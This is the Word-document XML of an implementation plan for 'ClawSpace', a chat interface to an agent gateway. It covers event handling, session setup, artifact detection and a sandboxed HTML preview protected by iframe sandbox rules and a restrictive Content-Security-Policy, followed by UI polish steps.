      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">method returns the server’s transcript. Map it to our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format.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exact shape of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">chat.history</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">response should be investigated at runtime. It returns the Gateway’s internal transcript representation. Parse it defensively.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When processing chat history or streaming events from the Gateway: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Validate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sessionKey</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— only process events for sessions that match</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">agent:main:clawspace:*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is a UUID that exists in the user’s project list. Drop events for unknown session keys.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Bound content size</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— if a single delta delivers more than 1MB of content, truncate it. This prevents memory exhaustion from a rogue gateway.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Never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eval()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 Function()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on any content from the gateway.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Type-check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payload.message</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— it can be a string, an object, or undefined. Handle all cases without crashing.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="75"/>
    <w:bookmarkStart w:id="76" w:name="step-6.4-handle-agent-events-tool-calls"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 6.4: Handle Agent Events (Tool Calls)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Agent events arrive as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{type:"event", event:"agent", payload:{...}}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AgentEventPayload {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session key</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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 contains tool call information. Key data patterns to handle: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data.type === "tool_use"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ Tool is being called (name, input)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data.type === "tool_result"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ Tool returned a result (content)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data.type === "text"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ Text delta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data.type === "thinking"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ Thinking/reasoning content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ToolCallCard</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">component that shows:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Tool name (e.g.,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">exec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web_search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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Input (collapsible JSON)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Output/result (collapsible, syntax highlighted)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Status: running → complete</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="76"/>
    <w:bookmarkStart w:id="77" w:name="step-6.5-session-initialization"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 6.5: Session Initialization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When a project is first opened and the Gateway is connected, ensure the session exists:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The session key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">agent:main:clawspace:&lt;projectId&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is auto-created by OpenClaw when the first</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">chat.send</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is made to it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Optionally, call</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions.patch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to set a label:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{key: sessionKey, label: projectName}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If the project has 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override, call</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions.patch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{key: sessionKey, model: modelId}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If the project has</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">customInstructions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, these should be prepended to the first message or injected via</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">chat.inject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hase-7-artifact-detection-preview-panel"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 7: Artifact Detection &amp; Preview Panel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Time estimate: ~3.5 hours</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies: Phase 5 (chat messages exist)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Sandboxed iframe with strict CSP, no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">allow-same-origin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, image validation</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="79" w:name="step-7.1-artifact-detector"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 7.1: Artifact Detector</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">src/lib/artifacts/detector.ts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DetectedArtifact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Byte position in the source message */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  startOffset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PREVIEWABLE_LANGUAGES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'python'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'yaml'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'markdown'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'shell'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'rust'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'swift'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'kotlin'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'svelte'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detectArtifacts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DetectedArtifact[]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DetectedArtifact[]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fenced code blocks with language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codeBlockRegex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/```</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(\w+)\n([\s\S]*?)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">```/g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RegExpExecArray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codeBlockRegex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(content))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create artifacts for substantial code blocks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PREVIEWABLE_LANGUAGES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(language))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'javascript'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`snippet.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endOffset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base64 images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/!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\[([^\]]*)\]\((</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">data:image</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\/[^)]+)\)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(content))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startOffset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endOffset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step-7.2-artifact-panel"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 7.2: Artifact Panel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src/components/artifacts/artifact-panel.tsx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A resizable right panel (using shadcn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ResizablePanelGroup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Header:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Artifact name + type badge + close button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 bar:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">If multiple artifacts, show tabs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Preview area:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Renders based on artifact type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Collapsed state:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">When no artifact selected, show a minimal bar or hide entirely</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="80"/>
    <w:bookmarkStart w:id="81" w:name="Xac836887ba6370a9a1c689de91281526868474c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 7.3: HTML Preview (Security-Critical Component)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src/components/artifacts/html-preview.tsx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: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 — CRITICAL:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HTML artifact previews execute user-generated (AI-generated) HTML and JavaScript. This is the single highest-risk component in the entire app. The sandbox configuration is a security boundary — get it wrong and XSS can compromise the entire ClawSpace session.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HTML Preview uses a heavily sandboxed iframe.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NEVER add 'allow-same-origin' to the sandbox. With allow-same-origin,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> * scripts inside the iframe can access the parent page's cookies, localStorage,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> * and Supabase auth tokens. This would be a critical XSS vulnerability.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sandbox attribute set is:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> * - allow-scripts: Let the HTML run JavaScript (needed for interactive previews)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Explicitly BLOCKED by omission:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> * - allow-same-origin: Blocks access to parent page's origin/storage/cookies</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> * - allow-forms: Blocks form submission (prevents data exfiltration via POST)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> * - allow-popups: Blocks window.open() and target="_blank" links</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> * - allow-top-navigation: Blocks redirecting the parent page</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> * - allow-modals: Blocks alert(), confirm(), prompt()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Additionally, we inject a CSP meta tag into the HTML to further restrict it.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wrapWithCSP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Inject a Content-Security-Policy meta tag that restricts the iframe content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cspTag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`&lt;meta http-equiv="Content-Security-Policy" content="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"default-src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Allow inline scripts (the whole point of the preview)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"script-src 'unsafe-inline' 'unsafe-eval'"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Allow inline styles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"style-src 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Allow images from data: and https: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"img-src data: https:"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 ALL network requests (no fetch, XHR, WebSocket, etc.)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prevents the preview from exfiltrating data or loading external resources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"connect-src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 fonts from external sources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"font-src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 frames-within-frames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"frame-src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 form submission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"form-action 'none'"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before &lt;/head&gt; if it exists, otherwise prepend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'&lt;/head&gt;'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'&lt;/head&gt;'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cspTag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&lt;/head&gt;`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'&lt;head&gt;'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'&lt;head&gt;'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`&lt;head&gt;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cspTag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`&lt;head&gt;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cspTag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&lt;/head&gt;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html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HtmlPreview</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({ content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Wrap content with CSP before rendering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wrapWithCSP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iframe</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      srcDoc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{safeContent}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    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"allow-scripts"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🔒 No allow-same-origin, no allow-forms, no allow-popups, no allow-top-navigation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border-0 bg-white rounded"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 Preview"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🔒 Block the iframe from using certain browser APIs</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      allow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referrerPolicy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"no-referrer"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The injected CSP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">connect-src 'none'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is critical. Without it, a malicious HTML preview could:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Make fetch/XHR requests to exfiltrate data visible in the DOM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Open WebSocket connections</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Load external scripts via dynamic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script src="..."&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tags</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With the CSP, the preview is a sealed sandbox: it can run JS and render HTML, but it cannot communicate with the outside world.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="81"/>
    <w:bookmarkStart w:id="82" w:name="step-7.4-code-preview"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 7.4: Code Preview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src/components/artifacts/code-preview.tsx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t xml:space="preserve">Syntax-highlighted code (same</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rehype-highlight</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">as chat)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Line numbers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Copy button (top-right)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Language label</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Word wrap toggle</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="82"/>
    <w:bookmarkStart w:id="83" w:name="step-7.5-markdown-preview"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 7.5: Markdown Preview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">src/components/artifacts/markdown-preview.tsx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Full markdown rendering (same renderer as chat messages)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Styled container with proper typography</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="83"/>
    <w:bookmarkStart w:id="84" w:name="step-7.6-artifact-persistence"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 7.6: Artifact Persistence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After detecting artifacts in a finalized assistant message, save to Supabase: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persistArtifacts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DetectedArtifact[]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artifacts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'artifacts'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(rows)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phase-8-polish-edge-cases"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 8: Polish &amp; Edge Cases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Time estimate: ~3 hours</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies: All prior phases</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="86" w:name="step-8.1-dark-mode"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 8.1: Dark Mode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1036"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement theme toggle (light/dark/system) using</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">next-themes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or manual class toggle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1036"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Store preference in localStorage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1036"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All components should use Tailwind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variants</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1036"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Test every component in both modes</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="86"/>
    <w:bookmarkStart w:id="87" w:name="step-8.2-responsive-design"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 8.2: Responsive Design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Mobile sidebar:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Use shadcn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component as a slide-out drawer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Mobile artifact panel:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Bottom sheet or full-screen overlay (dialog)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Touch targets:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Minimum 44px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Breakpoints:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1038"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt; 768px: mobile (drawer sidebar, stacked layout)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1038"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">768-1024px: tablet (collapsible sidebar, chat only)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1038"/>
        </w:numPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1024px: desktop (sidebar + chat + artifact panel)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="87"/>
    <w:bookmarkStart w:id="88" w:name="step-8.3-keyboard-shortcuts"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 8.3: Keyboard Shortcuts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Cmd/Ctrl + K:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Quick project switcher (command palette using shadcn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Cmd/Ctrl + N:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">New project dialog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Escape:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Close artifact panel / dialogs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Cmd/Ctrl + Shift + S:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Toggle sidebar</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="88"/>
    <w:bookmarkStart w:id="89" w:name="step-8.4-error-handling"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 8.4: Error Handling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Error boundaries:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Wrap main layout sections in React error boundaries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Toast notifications:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Use Sonner for:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1041"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Connection errors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
